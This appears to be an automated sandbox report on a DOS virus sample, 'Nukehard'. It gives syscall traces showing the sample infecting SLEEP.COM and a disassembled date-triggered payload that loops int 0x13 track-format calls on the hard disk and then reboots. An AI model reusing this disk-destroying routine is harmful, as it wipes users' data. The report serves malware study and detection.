Sample viewer

vx.netlux.org/Virus.DOS.NED.Nukehard

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:40:55.438589887Z 47 PC: 12aee | Get disk transfer address
2018-12-17T22:40:55.445168863Z 26 PC: 12af6 | Set disk transfer address
2018-12-17T22:40:55.44627998Z 47 PC: 12b48 | Get disk transfer address
2018-12-17T22:40:55.447606281Z 26 PC: 12b57 | Set disk transfer address
2018-12-17T22:40:55.44905363Z 78 PC: 12b5f | Find first file
2018-12-17T22:40:55.454606399Z 47 PC: 12b77 | Get disk transfer address
2018-12-17T22:40:55.455816121Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:55.461138157Z 63 PC: 12b9c | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:40:55.466951365Z 66 PC: 12ba4 | Move file pointer
2018-12-17T22:40:55.468350584Z 62 PC: 12ba9 | Close file
2018-12-17T22:40:55.470109578Z 67 PC: 12bca | Get or set file attributes
2018-12-17T22:40:55.48873476Z 61 PC: 12bcf | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:55.49634852Z 64 PC: 12bdb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:40:55.503935961Z 66 PC: 12be3 | Move file pointer
2018-12-17T22:40:55.509555255Z 64 PC: 12c06 | Write file or device (Write 1837 bytes on handle 5)
2018-12-17T22:40:55.519651197Z 87 PC: 12c11 | Get or set file date and time
2018-12-17T22:40:55.521604165Z 62 PC: 12c15 | Close file
2018-12-17T22:40:55.532325052Z 67 PC: 12c22 | Get or set file attributes
2018-12-17T22:40:55.542521523Z 26 PC: 12b71 | Set disk transfer address
2018-12-17T22:40:55.543683596Z 26 PC: 12afe | Set disk transfer address
2018-12-17T22:40:55.545145501Z 42 PC: 12b18 | Get date
0x12b18: cmp dh, 0xc
0x12b1b: jne 0x12b33
0x12b1d: mov ch, 0
0x12b1f: mov ah, 5
0x12b21: mov dh, 0
0x12b23: mov dl, 0x80
0x12b25: int 0x13
0x12b27: inc ch
0x12b29: cmp ch, 0x20
0x12b2c: loopne 0x12b1f
0x12b2e: ljmp 0xffff:0xfff0
0x12b33: pop ax
0x12b34: pop dx
0x12b35: lea dx, word ptr [di + 0x170]
0x12b39: call 0x12b43
0x12b3c: ret
0x12b3d: sub ch, byte ptr [0x4f43]
0x12b41: dec bp
0x12b42: add byte ptr [di - 0x4c], dl
0x12b45: das

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7099,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:51.283641482Z 47 PC: 12aee | Get disk transfer address
2018-12-25T12:00:51.285624191Z 26 PC: 12af6 | Set disk transfer address
2018-12-25T12:00:51.286568922Z 47 PC: 12b48 | Get disk transfer address
2018-12-25T12:00:51.287514423Z 26 PC: 12b57 | Set disk transfer address
2018-12-25T12:00:51.289571307Z 78 PC: 12b5f | Find first file
2018-12-25T12:00:51.295823631Z 47 PC: 12b77 | Get disk transfer address
2018-12-25T12:00:51.297312567Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:51.303681244Z 63 PC: 12b9c | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:00:51.31006406Z 66 PC: 12ba4 | Move file pointer
2018-12-25T12:00:51.311372844Z 62 PC: 12ba9 | Close file
2018-12-25T12:00:51.313016659Z 67 PC: 12bca | Get or set file attributes
2018-12-25T12:00:51.333048988Z 61 PC: 12bcf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:51.342592295Z 64 PC: 12bdb | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:00:51.349134662Z 66 PC: 12be3 | Move file pointer
2018-12-25T12:00:51.355636146Z 64 PC: 12c06 | Write file or device (Write 1836 bytes on handle 5)
2018-12-25T12:00:51.364146139Z 87 PC: 12c11 | Get or set file date and time
2018-12-25T12:00:51.365850373Z 62 PC: 12c15 | Close file
2018-12-25T12:00:51.374866854Z 67 PC: 12c22 | Get or set file attributes
2018-12-25T12:00:51.391886377Z 26 PC: 12b71 | Set disk transfer address
2018-12-25T12:00:51.395339287Z 26 PC: 12afe | Set disk transfer address
2018-12-25T12:00:51.397021983Z 42 PC: 12b18 | Get date
0x12b18: cmp dh, 0xc
0x12b1b: jne 0x12b33
0x12b1d: mov ch, 0
0x12b1f: mov ah, 5
0x12b21: mov dh, 0
0x12b23: mov dl, 0x80
0x12b25: int 0x13
0x12b27: inc ch
0x12b29: cmp ch, 0x20
0x12b2c: loopne 0x12b1f
0x12b2e: ljmp 0xffff:0xfff0
0x12b33: pop ax
0x12b34: pop dx
0x12b35: lea dx, word ptr [di + 0x170]
0x12b39: call 0x12b43
0x12b3c: ret
0x12b3d: sub ch, byte ptr [0x4f43]
0x12b41: dec bp
0x12b42: add byte ptr [di - 0x4c], dl
0x12b45: das
2018-12-25T12:00:51.402962496Z 47 PC: 12b48 | Get disk transfer address (See above)
2018-12-25T12:00:51.404351862Z 26 PC: 12b57 | Set disk transfer address (See above)
2018-12-25T12:00:51.405860688Z 78 PC: 12b5f | Find first file (See above)
2018-12-25T12:00:51.412855372Z 47 PC: 12b77 | Get disk transfer address (See above)
2018-12-25T12:00:51.414809962Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:00:51.421634697Z 63 PC: 12b9c | Read file or device (See above)
2018-12-25T12:00:51.431001266Z 66 PC: 12ba4 | Move file pointer (See above)
2018-12-25T12:00:51.432425082Z 62 PC: 12ba9 | Close file (See above)
2018-12-25T12:00:51.434066611Z 79 PC: 12b5f | Find next file (See above)
2018-12-25T12:00:51.437206508Z 47 PC: 12b77 | Get disk transfer address (See above)
2018-12-25T12:00:51.43838219Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:00:51.444812807Z 63 PC: 12b9c | Read file or device (See above)
2018-12-25T12:00:51.45341196Z 66 PC: 12ba4 | Move file pointer (See above)
2018-12-25T12:00:51.454892656Z 62 PC: 12ba9 | Close file (See above)
2018-12-25T12:00:51.456672514Z 67 PC: 12bca | Get or set file attributes (See above)
2018-12-25T12:00:51.474513466Z 61 PC: 12bcf | Open file (See above)
2018-12-25T12:00:51.481152696Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:00:51.484231441Z 66 PC: 12be3 | Move file pointer (See above)
2018-12-25T12:00:51.488862216Z 64 PC: 12c06 | Write file or device (See above)
2018-12-25T12:00:51.498084349Z 87 PC: 12c11 | Get or set file date and time (See above)
2018-12-25T12:00:51.499611862Z 62 PC: 12c15 | Close file (See above)
2018-12-25T12:00:51.508451344Z 67 PC: 12c22 | Get or set file attributes (See above)
2018-12-25T12:00:51.518451593Z 26 PC: 12b71 | Set disk transfer address (See above)
2018-12-25T12:00:51.519583688Z 9 PC: 12a47 | Display string (String= 'IT'S HARD DROPPER - SMAUG' [trailing undecodable bytes omitted])

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7099,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:51.384288892Z 47 PC: 12aee | Get disk transfer address
2018-12-25T12:00:51.385891052Z 26 PC: 12af6 | Set disk transfer address
2018-12-25T12:00:51.38716079Z 47 PC: 12b48 | Get disk transfer address
2018-12-25T12:00:51.388135939Z 26 PC: 12b57 | Set disk transfer address
2018-12-25T12:00:51.389145204Z 78 PC: 12b5f | Find first file
2018-12-25T12:00:51.395114404Z 47 PC: 12b77 | Get disk transfer address
2018-12-25T12:00:51.396040237Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:51.400377954Z 63 PC: 12b9c | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:00:51.4128365Z 66 PC: 12ba4 | Move file pointer
2018-12-25T12:00:51.413915316Z 62 PC: 12ba9 | Close file
2018-12-25T12:00:51.41518102Z 67 PC: 12bca | Get or set file attributes
2018-12-25T12:00:51.428244731Z 61 PC: 12bcf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:51.433080214Z 64 PC: 12bdb | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:00:51.436624726Z 66 PC: 12be3 | Move file pointer
2018-12-25T12:00:51.442152503Z 64 PC: 12c06 | Write file or device (Write 1844 bytes on handle 5)
2018-12-25T12:00:51.453171534Z 87 PC: 12c11 | Get or set file date and time
2018-12-25T12:00:51.455365244Z 62 PC: 12c15 | Close file
2018-12-25T12:00:51.464915633Z 67 PC: 12c22 | Get or set file attributes
2018-12-25T12:00:51.477882431Z 26 PC: 12b71 | Set disk transfer address
2018-12-25T12:00:51.479266298Z 26 PC: 12afe | Set disk transfer address
2018-12-25T12:00:51.480941253Z 42 PC: 12b18 | Get date
0x12b18: cmp dh, 0xc
0x12b1b: jne 0x12b33
0x12b1d: mov ch, 0
0x12b1f: mov ah, 5
0x12b21: mov dh, 0
0x12b23: mov dl, 0x80
0x12b25: int 0x13
0x12b27: inc ch
0x12b29: cmp ch, 0x20
0x12b2c: loopne 0x12b1f
0x12b2e: ljmp 0xffff:0xfff0
0x12b33: pop ax
0x12b34: pop dx
0x12b35: lea dx, word ptr [di + 0x170]
0x12b39: call 0x12b43
0x12b3c: ret
0x12b3d: sub ch, byte ptr [0x4f43]
0x12b41: dec bp
0x12b42: add byte ptr [di - 0x4c], dl
0x12b45: das